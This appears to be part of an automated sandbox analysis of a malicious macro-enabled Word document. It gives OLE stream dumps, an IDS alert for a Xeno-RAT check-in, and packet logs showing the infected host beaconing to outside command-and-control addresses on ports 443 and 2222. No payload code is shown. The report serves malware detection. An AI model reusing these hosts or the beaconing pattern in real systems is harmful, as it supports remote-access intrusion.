                                  Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                  Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                  General
                                  Stream Path:Data
                                  CLSID:
                                  File Type:dBase III DBT, version number 0, next free block index 8018, 1st item "\350@\020\350\034\201Q\222~\376\371\347M\354\177\375\353_-|\354\337\377\376w\373\333\247g\177\375\353_\333\357\037}\364\321\354\263\317>\233\275\361\306\033\3732\315O?\375\264\215\373\227\277\374\345\377\306\177\357\275\367Fe"\373n"
                                  Stream Size:8018
                                  Entropy:7.877706425678382
                                  Base64 Encoded:True
                                  Data ASCII:R . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . Y . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . C . . 6 . . . . A . . . . . . . . . . . . . . . . . . . . T . T . T . m . t . s . 1 . 0 . 3 . S . w . i . f . t . . . . . . . . . . . . . b . . . . . . . # x . B & . K . \\ . . . . . . . . D . . . . . / . . n . x . . . # x . B & . K . \\ P N G . . . . . . . . I H D R . . . . . . . . . . . . n . . . . g A M A . . . a . . . . . p H Y s .
                                  Data Raw:52 1f 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a7 0d 01 0e 59 0a 59 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 5a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 36 00 00 00 04 41 01 00 00 00 05 c1 1e 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 54 00 54 00
                                  General
                                  Stream Path:Macros/PROJECT
                                  CLSID:
                                  File Type:ASCII text, with CRLF line terminators
                                  Stream Size:491
                                  Entropy:5.186496171485735
                                  Base64 Encoded:True
                                  Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B B 7 E 4 D C D 5 1 C D 5 1 C 9 5 5 C 9 5 5 " . . D P B = " 9 1 9 3 3 D 2 2 5 A 2 2 5 A D D A 6 2 3 5 A 4 F B 5 3 6 7 4 3 C F C 0 C B
                                  Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65
                                  General
                                  Stream Path:Macros/PROJECTwm
                                  CLSID:
                                  File Type:data
                                  Stream Size:71
                                  Entropy:3.3485999524807437
                                  Base64 Encoded:False
                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                                  General
                                  Stream Path:Macros/VBA/_VBA_PROJECT
                                  CLSID:
                                  File Type:data
                                  Stream Size:4795
                                  Entropy:5.477599138186567
                                  Base64 Encoded:False
                                  Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                  Data Raw:cc 61 94 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                  General
                                  Stream Path:Macros/VBA/dir
                                  CLSID:
                                  File Type:data
                                  Stream Size:579
                                  Entropy:6.3396620203061405
                                  Base64 Encoded:True
                                  Data ASCII:. ? . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . y e i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . @ c . . . ! O f f i c . g O . f . i . c .
                                  Data Raw:01 3f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 79 d4 65 69 19 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                  General
                                  Stream Path:WordDocument
                                  CLSID:
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:1.045776662127258
                                  Base64 Encoded:False
                                  Data ASCII:. _ . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j , E , E . . . . . . . . . . . . . . . . . . . . . . . . . . N / . . N / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . f . . . . .
                                  Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 2c 45 2c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 4e 2f 00 00 4e 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-06T10:30:33.399094+01002050110ET MALWARE [ANY.RUN] Xeno-RAT TCP Check-In187.120.120.272222192.168.2.2249170TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 6, 2024 10:29:48.108491898 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:48.108542919 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:48.108620882 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:48.114562988 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:48.114579916 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:49.890937090 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:49.891037941 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:49.896460056 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:49.896480083 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:49.896821976 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:49.896877050 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:49.967729092 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.011336088 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.478101969 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.478156090 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.478193998 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.478374004 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.478374004 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.478416920 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.478463888 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.484230995 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.592751980 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.592809916 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.592988968 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.592989922 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.593019962 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.593046904 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.593063116 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.638819933 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.638879061 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.638895988 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.638916969 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.638932943 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.638932943 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.638951063 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.639045954 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.762263060 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.762315035 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.762347937 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.762389898 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.762404919 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.762434959 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.762504101 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.790800095 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.790853977 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.790910006 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.790927887 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.790941954 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.790968895 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.791076899 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.822936058 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.822983980 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.823154926 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.823154926 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.823170900 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.823194027 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.823206902 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.932708025 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.932756901 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.932809114 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.932830095 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.932842970 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.932863951 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.932950974 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.953926086 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.953969002 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.953996897 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.954008102 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.954020977 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.954034090 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.954123020 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.971527100 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.971575975 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.971611977 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.971628904 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.971640110 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.971662998 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.971714020 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.991271019 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.991329908 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.991339922 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.991347075 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.991372108 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.991384983 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.991429090 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.999171972 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.999239922 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.999241114 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.999279022 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.999362946 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.999377012 CET4434916187.121.86.205192.168.2.22
                                  Dec 6, 2024 10:29:50.999386072 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:50.999423981 CET49161443192.168.2.2287.121.86.205
                                  Dec 6, 2024 10:29:57.929217100 CET491622222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:29:58.049303055 CET22224916287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:29:58.051814079 CET491622222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:00.183830023 CET22224916287.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:00.183970928 CET491622222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:00.317980051 CET491632222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:00.438020945 CET22224916387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:00.438107014 CET491632222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:02.572254896 CET22224916387.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:02.572318077 CET491632222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:02.711007118 CET491642222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:02.830986977 CET22224916487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:02.831114054 CET491642222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:04.961714983 CET22224916487.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:04.961888075 CET491642222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:05.060390949 CET491652222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:05.180315971 CET22224916587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:05.180392981 CET491652222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:07.307179928 CET22224916587.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:07.307261944 CET491652222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:07.417316914 CET491662222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:07.537286043 CET22224916687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:07.537453890 CET491662222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:09.697206974 CET22224916687.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:09.697349072 CET491662222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:09.818065882 CET491672222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:09.938441992 CET22224916787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:09.938620090 CET491672222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:12.092314959 CET22224916787.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:12.092781067 CET491672222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:12.189317942 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:12.309247017 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:12.309390068 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:14.667064905 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:14.692172050 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:14.812283993 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:15.084779978 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:15.087116957 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:15.207030058 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:15.477164030 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:15.669122934 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:15.669233084 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:15.722166061 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:15.842061043 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:16.132560015 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:16.135778904 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:16.255520105 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:16.255671024 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:16.338634968 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:17.459187984 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:17.460726976 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:17.582946062 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:17.852987051 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:17.892158985 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:17.906586885 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:17.928653002 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:17.947803974 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:18.011892080 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:18.026357889 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:18.048712969 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:18.069021940 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:19.352313042 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:19.353517056 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:19.355882883 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:19.357239962 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:19.473443985 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:19.473588943 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:19.477303028 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:19.567852020 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:20.675327063 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:20.677222967 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:20.754812002 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:20.756941080 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:20.797059059 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:20.877203941 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:21.070174932 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:21.071924925 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:21.072408915 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:21.072881937 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:21.073344946 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:21.191751957 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:21.192037106 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:21.192488909 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:21.193002939 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:22.148225069 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:22.149862051 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:22.269747019 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:22.484040976 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:22.490665913 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:22.610532045 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:23.573246002 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:23.574877024 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:23.694564104 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:24.897176027 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:24.900796890 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:24.982326031 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:24.983851910 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:25.021301031 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:25.103880882 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:26.415674925 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:26.417634010 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:26.537497997 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:27.305300951 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:27.309969902 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:27.429919004 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:27.829886913 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:27.831769943 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:27.951649904 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:29.231834888 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:29.233418941 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:29.353312016 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:29.718638897 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:29.722846985 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:29.842799902 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:30.639153004 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:30.640805006 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:30.760658979 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:32.032990932 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:32.034585953 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:32.133480072 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:32.136930943 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:32.154555082 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:32.258125067 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.273607016 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.273704052 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.274276972 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.274332047 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.274894953 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.274951935 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.278701067 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.278896093 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.279227972 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.281748056 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.281960964 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.282191992 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.282639027 CET491712222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.398463964 CET22224916887.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.398519993 CET491682222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.398700953 CET22224916987.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.398752928 CET491692222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.399094105 CET22224917087.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.399130106 CET491702222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:33.402415991 CET22224917187.120.120.27192.168.2.22
                                  Dec 6, 2024 10:30:33.402508020 CET491712222192.168.2.2287.120.120.27
                                  Dec 6, 2024 10:30:35.528418064 CET22224917187.120.120.27192.168.2.22
